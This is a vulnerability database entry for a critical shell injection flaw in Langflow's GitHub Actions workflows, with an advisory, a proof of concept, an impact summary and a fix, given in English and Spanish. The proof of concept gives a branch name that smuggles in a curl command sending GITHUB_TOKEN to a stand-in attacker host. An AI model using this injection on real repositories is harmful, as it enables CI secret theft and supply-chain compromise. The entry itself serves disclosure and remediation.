FKIE_CVE-2026-33475

Vulnerability from fkie_nvd - Published: 2026-03-24 13:16 - Updated: 2026-03-24 19:13
Severity ?
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Summary
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
References
security-advisories@github.comhttps://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4wExploit, Mitigation, Vendor Advisory
Impacted products
Vendor Product Version
langflow langflow *
To clipboard 

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D51A889E-5C89-4A92-B32B-C91EAF735430",
              "versionEndExcluding": "1.9.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.\n\n---\n\n### Details\n\nSeveral workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:\n\n```yaml\nrun: |\n  validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nOr:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nSince `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.\n\n---\n\n### PoC\n\n1. **Fork** the Langflow repository\n2. **Create a new branch** with the name:\n   ```bash\n   injection-test \u0026\u0026 curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n3. **Open a Pull Request** to the main branch from the new branch\n4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)\n5. The `run:` step containing:\n   ```yaml\n   echo \"Branch: ${{ github.head_ref }}\"\n   ```\n   Will execute:\n   ```bash\n   echo \"Branch: injection-test\"\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n\n6. The attacker receives the CI secret via the exfil URL.\n\n---\n\n### Impact\n\n- **Type:** Shell Injection / Remote Code Execution in CI\n- **Scope:** Any public Langflow fork with GitHub Actions enabled\n- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data\n\n---\n\n### Suggested Fix\n\nRefactor affected workflows to **use environment variables** and wrap them in **double quotes**:\n\n```yaml\nenv:\n  BRANCH_NAME: ${{ github.head_ref }}\nrun: |\n  echo \"Branch is: \\\"$BRANCH_NAME\\\"\"\n```\n\nAvoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.\n\n---\n\n### Affected Files (Langflow `1.3.4`)\n\n- `.github/actions/install-playwright/action.yml`\n- `.github/workflows/deploy-docs-draft.yml`\n- `.github/workflows/docker-build.yml`\n- `.github/workflows/release_nightly.yml`\n- `.github/workflows/python_test.yml`\n- `.github/workflows/typescript_test.yml`"
    },
    {
      "lang": "es",
      "value": "Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Una vulnerabilidad de inyecci\u00f3n de shell remota no autenticada existe en m\u00faltiples flujos de trabajo de GitHub Actions en el repositorio de Langflow antes de la versi\u00f3n 1.9.0. La interpolaci\u00f3n no saneada de variables de contexto de GitHub (por ejemplo, `${{ github.head_ref }}`) en los pasos `run:` permite a los atacantes inyectar y ejecutar comandos de shell arbitrarios a trav\u00e9s de un nombre de rama o t\u00edtulo de solicitud de extracci\u00f3n malicioso. Esto puede llevar a la exfiltraci\u00f3n de secretos (por ejemplo, `GITHUB_TOKEN`), manipulaci\u00f3n de infraestructura o compromiso de la cadena de suministro durante la ejecuci\u00f3n de CI/CD. La versi\u00f3n 1.9.0 parchea la vulnerabilidad.\n\n---\n\n### Detalles\n\nVarios flujos de trabajo en `.github/workflows/` y `.github/actions/` referencian variables de contexto de GitHub directamente en comandos de shell `run:`, como:\n\n```yaml\nrun: |\n  validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nO:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nDado que `github.head_ref`, `github.event.pull_request.title` y `inputs.*` personalizados pueden contener valores controlados por el usuario, deben tratarse como entrada no confiable. La interpolaci\u00f3n directa sin el entrecomillado o saneamiento adecuados conduce a la inyecci\u00f3n de comandos de shell.\n\n---\n\n### PoC\n\n1. Bifurcar el repositorio de Langflow\n2. Crear una nueva rama con el nombre:\n   ```bash\n   injection-test \u0026amp;\u0026amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n3. Abrir una solicitud de extracci\u00f3n a la rama principal desde la nueva rama\n4. GitHub Actions ejecutar\u00e1 el flujo de trabajo afectado (por ejemplo, `deploy-docs-draft.yml`)\n5. El paso `run:` que contiene:\n   ```yaml\n   echo \"Branch: ${{ github.head_ref }}\"\n   ```\n   Ejecutar\u00e1:\n   ```bash\n   echo \"Branch: injection-test\"\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n\n6. El atacante recibe el secreto de CI a trav\u00e9s de la URL de exfiltraci\u00f3n.\n\n---\n\n### Impacto\n\n- Tipo: Inyecci\u00f3n de Shell / Ejecuci\u00f3n Remota de C\u00f3digo en CI\n- Alcance: Cualquier bifurcaci\u00f3n p\u00fablica de Langflow con GitHub Actions habilitado\n- Impacto: Acceso total a secretos de CI (por ejemplo, `GITHUB_TOKEN`), posibilidad de subir etiquetas o im\u00e1genes maliciosas, manipular lanzamientos o filtrar datos de infraestructura sensibles\n\n---\n\n### Soluci\u00f3n Sugerida\n\nRefactorizar los flujos de trabajo afectados para usar variables de entorno y envolverlas en comillas dobles:\n\n```yaml\nenv:\n  BRANCH_NAME: ${{ github.head_ref }}\nrun: |\n  echo \"Branch is: \\\"$BRANCH_NAME\\\"\"\n```\n\nEvitar la interpolaci\u00f3n directa `${{ ... }}` dentro de `run:` para cualquier valor controlado por el usuario.\n\n---\n\n### Archivos Afectados (Langflow `1.3.4`)\n\n- `.github/actions/install-playwright/action.yml`\n- `.github/workflows/deploy-docs-draft.yml`\n- `.github/workflows/docker-build.yml`\n- `.github/workflows/release_nightly.yml`\n- `.github/workflows/python_test.yml`\n- `.github/workflows/typescript_test.yml`"
    }
  ],
  "id": "CVE-2026-33475",
  "lastModified": "2026-03-24T19:13:01.250",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-24T13:16:04.030",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-74"
        },
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.